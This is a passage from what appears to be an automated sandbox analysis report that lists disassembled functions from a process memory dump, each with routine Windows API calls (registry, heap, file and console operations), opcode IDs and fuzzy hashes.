                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: ErrorHeapMode$AllocByteCharMultiPresenceProcessQueryWidelongjmp
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 129137517-0
                                                                                                                                                                                                                          • Opcode ID: 540e17f8ededeb92b8751c102f8713e222b7ef2e7fdba453ee77f6ae435078b1
                                                                                                                                                                                                                          • Instruction ID: 6dbec62caa868f1ea75442f7d125b32a9cc028febf0e35c8ae2045051d3098c1
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 540e17f8ededeb92b8751c102f8713e222b7ef2e7fdba453ee77f6ae435078b1
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 002157762026016BCB24BF789C559BF3BAADFE53107084629F902C7385EFB89D45C2A0
                                                                                                                                                                                                                          Function 001B62B3 Relevance: 6.1, APIs: 4, Instructions: 81registryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,001BCD20,0000001C,001B58DF), ref: 001B62E6
                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,001BCD20,0000001C,001B58DF), ref: 001B6301
                                                                                                                                                                                                                          • RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 001B6340
                                                                                                                                                                                                                          • SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 001B635D
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: QueryValue$ErrorLastOpen
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4270309053-0
                                                                                                                                                                                                                          • Opcode ID: a23f13e170dee7dcbf73b8a8e2d01a89f2007ea2fd9ebe19a5c61ff1b7463768
                                                                                                                                                                                                                          • Instruction ID: 9f792ea56f60114add34af54883599d8fd83bc16fea84dc3393887b8423c8eb6
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a23f13e170dee7dcbf73b8a8e2d01a89f2007ea2fd9ebe19a5c61ff1b7463768
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 33212AB1D01219AFEB109F999C819EEBBFCFB68750F54416AE905B3250D7758D00CBA0
                                                                                                                                                                                                                          Function 001B9FF8 Relevance: 6.1, APIs: 4, Instructions: 81COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BA034
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00450052,-00000209,00000000,?,-00000209,0020005D,0019234C,0020005D), ref: 001BA078
                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001BA0AA
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000209,0020005D,0019234C,0020005D), ref: 001BA0C2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$DriveFullNamePathType
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3442494845-0
                                                                                                                                                                                                                          • Opcode ID: 847ceae0350eb0496a40a3c937951ff681deb3434803a18536a0bcdb97172826
                                                                                                                                                                                                                          • Instruction ID: 6eed45c912936c18e204108d0b559e2ab82d8ab8df717f57a3860fe22e715f50
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 847ceae0350eb0496a40a3c937951ff681deb3434803a18536a0bcdb97172826
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6D216571A0121AABDB24DFA9DD899EFBBF8EF58304F4401AAF505D3141E734DE448A92
                                                                                                                                                                                                                          Function 001A2960 Relevance: 6.1, APIs: 4, Instructions: 76stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 001A2977
                                                                                                                                                                                                                          • wcstol.MSVCRT ref: 001A2987
                                                                                                                                                                                                                          • lstrcmpW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,0019E559,?,?,00000000,?), ref: 001A29FF
                                                                                                                                                                                                                          • lstrcmpiW.API-MS-WIN-CORE-STRING-OBSOLETE-L1-1-0(?,?,?,0019E559,?,?,00000000,?), ref: 001A2A09
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: wcstol$lstrcmplstrcmpi
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 4273384694-0
                                                                                                                                                                                                                          • Opcode ID: 67f8fa504604f084b8958b78a422776256563d9c34a39c53891182c5fe805d72
                                                                                                                                                                                                                          • Instruction ID: 09f428f4ea1d5e4d4301addf92b1ab2aa7cc9ccd88174dfc38b081f2fe342817
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 67f8fa504604f084b8958b78a422776256563d9c34a39c53891182c5fe805d72
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C111D63A901536BF87255B7C8A0897BBB6CFF02758B560211E801D7950D775ED50E6E0
                                                                                                                                                                                                                          Function 001BC535 Relevance: 6.1, APIs: 4, Instructions: 71COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • memset.MSVCRT ref: 001BC56B
                                                                                                                                                                                                                            • Part of subcall function 0019E3F0: memset.MSVCRT ref: 0019E455
                                                                                                                                                                                                                          • GetVolumePathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,00000000,00000001,-00000001,00000001,00000000,00000000), ref: 001BC5A5
                                                                                                                                                                                                                          • GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000), ref: 001BC5BD
                                                                                                                                                                                                                          • ??_V@YAXPAX@Z.MSVCRT(00000000,-00000001,00000001,00000000,00000000), ref: 001BC5DA
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: memset$DriveNamePathTypeVolume
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1029679093-0
                                                                                                                                                                                                                          • Opcode ID: 31fe6db454935f7ea3f585c6832fa74b0c5ca7854c7eebbedb409940269169bd
                                                                                                                                                                                                                          • Instruction ID: f949e50dbd71561a78aa60888f3c54c0c09fe04f3eb685288127fd8d65eb063f
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 31fe6db454935f7ea3f585c6832fa74b0c5ca7854c7eebbedb409940269169bd
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 11213072B012096BDF20DBA5DC89BEFBBFCEF44344F140569E505D3141E774EA848AA1
                                                                                                                                                                                                                          Function 001A4C40 Relevance: 6.1, APIs: 4, Instructions: 68COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                          • Opcode ID: cbfb7ac4dc2640e610864cff9c009f8d6934c226aff569e25a42d18fea585865
                                                                                                                                                                                                                          • Instruction ID: c11aec9e24be745007f5f19b6953d5a56df016daf61a9a43ec7862e762534406
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: cbfb7ac4dc2640e610864cff9c009f8d6934c226aff569e25a42d18fea585865
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B911E739202604ABDB269B649E99FEF7759EF89724F14411AF802C71D0DB70DE81C792
                                                                                                                                                                                                                          Function 001B9809 Relevance: 6.1, APIs: 4, Instructions: 65fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • _get_osfhandle.MSVCRT ref: 001B9822
                                                                                                                                                                                                                          • WriteFile.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001B92EA,?,?,00000000,?,?,?,?,?,?,?,?,?,?,?), ref: 001B982A
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B9841
                                                                                                                                                                                                                          • DeleteFileW.API-MS-WIN-CORE-FILE-L1-1-0(?), ref: 001B986E
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: File$DeleteErrorLastWrite_get_osfhandle
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2448200120-0
                                                                                                                                                                                                                          • Opcode ID: 5666937bdc28407e44df74684e1587bc2567630e5b8da1fda0939ccd504f9d71
                                                                                                                                                                                                                          • Instruction ID: 1bf6b3d96f262f52db57f78c5d86c86f41a0329389131fed14acecb5a5b95786
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5666937bdc28407e44df74684e1587bc2567630e5b8da1fda0939ccd504f9d71
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD11E731201208AFDF15AB71EC4AEFF3B59EF86B15F10402AF50586151DB74CC82CB61
                                                                                                                                                                                                                          Function 00197221 Relevance: 6.1, APIs: 4, Instructions: 61memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,?,001B9962,00000000,?,00000000,001ACF94,00000000,?), ref: 0019727F
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 00197286
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?), ref: 001972AF
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 001972B6
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                                          • Opcode ID: 8b199f8ab3ebd53db5c904b020ec64389b5c8757d8cb0f55227f80dd8eacd576
                                                                                                                                                                                                                          • Instruction ID: 24bef94575211d6d7bc9548839c37bb323771ff7d848ef03cef3b78c8f7b7285
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8b199f8ab3ebd53db5c904b020ec64389b5c8757d8cb0f55227f80dd8eacd576
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E11E73162A2408BCF24AF79D805B367BA1EF96315F24484EF497CB6D1CB34D842D761
                                                                                                                                                                                                                          Function 001962C8 Relevance: 6.1, APIs: 4, Instructions: 60memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,00000000,00000000,00000000,00196231,00000000,00000000,91B40133), ref: 0019630C
                                                                                                                                                                                                                          • HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 00196313
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$AllocProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1617791916-0
                                                                                                                                                                                                                          • Opcode ID: 7d646b57a7bb89f5f60f697193054a99d53d5c50a4dff434a1921396024fb826
                                                                                                                                                                                                                          • Instruction ID: 62f69c5955f935ad432defab01f07c79675598903f6aee49093de8473be252dd
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d646b57a7bb89f5f60f697193054a99d53d5c50a4dff434a1921396024fb826
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: ED11443670312197CE289B255824B3F771ABFC0B11F5A001AE80A9BA90CF229D43D6B2
                                                                                                                                                                                                                          Function 0019DD20 Relevance: 6.1, APIs: 4, Instructions: 56memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,00000000,0019BDB3,00000000,?), ref: 0019DD37
                                                                                                                                                                                                                          • HeapReAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0019DD3E
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000), ref: 0019DD53
                                                                                                                                                                                                                          • HeapSize.API-MS-WIN-CORE-HEAP-L1-1-0(00000000), ref: 0019DD5A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$Process$AllocSize
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2549470565-0
                                                                                                                                                                                                                          • Opcode ID: 2a6c1424777bc3238b4d45fce3e892408b20db11850ed6413b1dc791061e3eb3
                                                                                                                                                                                                                          • Instruction ID: 13ccb6b8e9f32b9ff3215516034f1484eee7ef257c71e5d83479bb4c3bf1cf4b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2a6c1424777bc3238b4d45fce3e892408b20db11850ed6413b1dc791061e3eb3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D801B176202311ABCB219BA4FC88E9A77A9EF94756FA00422F50AC7490DB31DC84C7A1
                                                                                                                                                                                                                          Function 001B8496 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5,?,?,?,?,?,?,?,?,?,?,00198A51), ref: 001B84B9
                                                                                                                                                                                                                          • GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00198A51), ref: 001B84C6
                                                                                                                                                                                                                          • FillConsoleOutputAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00198A51), ref: 001B84EA
                                                                                                                                                                                                                          • SetConsoleTextAttribute.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,?,?,?,?,?,?,?,?,00198A51), ref: 001B84F2
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Console$Attribute$BufferFillHandleInfoOutputScreenText
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1033415088-0
                                                                                                                                                                                                                          • Opcode ID: dbc89c114bcb4ff271fad94dddaf5fbe13bcc826b21b329df944d0dda4d8e010
                                                                                                                                                                                                                          • Instruction ID: 58fee725351b02058619ee0b7ef8d36232f6c461039ee45830cb425b0928ebb9
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dbc89c114bcb4ff271fad94dddaf5fbe13bcc826b21b329df944d0dda4d8e010
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A8014F71A02119AF8B04EBB89C88AFFB7ECEF0E710B40012AF916E2150EB249D45C765
                                                                                                                                                                                                                          Function 001A5643 Relevance: 6.0, APIs: 4, Instructions: 46fileCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                            • Part of subcall function 001A0060: wcschr.MSVCRT ref: 001A006C
                                                                                                                                                                                                                          • CreateFileW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,40000000,00000000,0000000C,00000004,08000080,00000000,00000000,00000000), ref: 001A5678
                                                                                                                                                                                                                          • _open_osfhandle.MSVCRT ref: 001A568C
                                                                                                                                                                                                                          • CloseHandle.API-MS-WIN-CORE-HANDLE-L1-1-0(00000000), ref: 001A56A2
                                                                                                                                                                                                                          • GetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0 ref: 001B122B
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CloseCreateErrorFileHandleLast_open_osfhandlewcschr
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 22757656-0
                                                                                                                                                                                                                          • Opcode ID: 3ec231d5a865b92c1f46db19410dcb0bde65a6f803de861b19db9b9b9fbe2bdc
                                                                                                                                                                                                                          • Instruction ID: 8a9f11fc5a8b1ad1ddba8919fa232819099e324bc9353f45ab89bb384ab01e77
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3ec231d5a865b92c1f46db19410dcb0bde65a6f803de861b19db9b9b9fbe2bdc
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 94012675806210BFD7206BB89C4DB9E7BB9EB42734F614306F421E31E0DBB048858691
                                                                                                                                                                                                                          Function 001B24F6 Relevance: 6.0, APIs: 4, Instructions: 36memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,001B22F8), ref: 001B2514
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000,?,?), ref: 001B251B
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,001B22F8), ref: 001B2539
                                                                                                                                                                                                                          • RtlFreeHeap.NTDLL(00000000), ref: 001B2540
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 0000000D.00000002.1629765335.0000000000191000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00190000, based on PE: true
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629711951.0000000000190000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629876713.00000000001BE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DA000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 0000000D.00000002.1629927979.00000000001DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_13_2_190000_alpha.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Heap$FreeProcess
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3859560861-0
                                                                                                                                                                                                                          • Opcode ID: 1c36ac9ff0f335e64d0e5d602bea845a9b86a5fe8eb920d04c704bc89b44e9ec
                                                                                                                                                                                                                          • Instruction ID: 07ada84e9fa8a1a84959a01d41520a34072b3a565b8dc5ce319deeed0d6ba035
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 1c36ac9ff0f335e64d0e5d602bea845a9b86a5fe8eb920d04c704bc89b44e9ec
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F06D72612211AFD724DFA1EC89BA6B7F8FF48312F50092EE141C6440E774E999CBA1
                                                                                                                                                                                                                          Function 00198B96 Relevance: 6.0, APIs: 4, Instructions: 30memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000004,?,0019885E), ref: 00198B9D
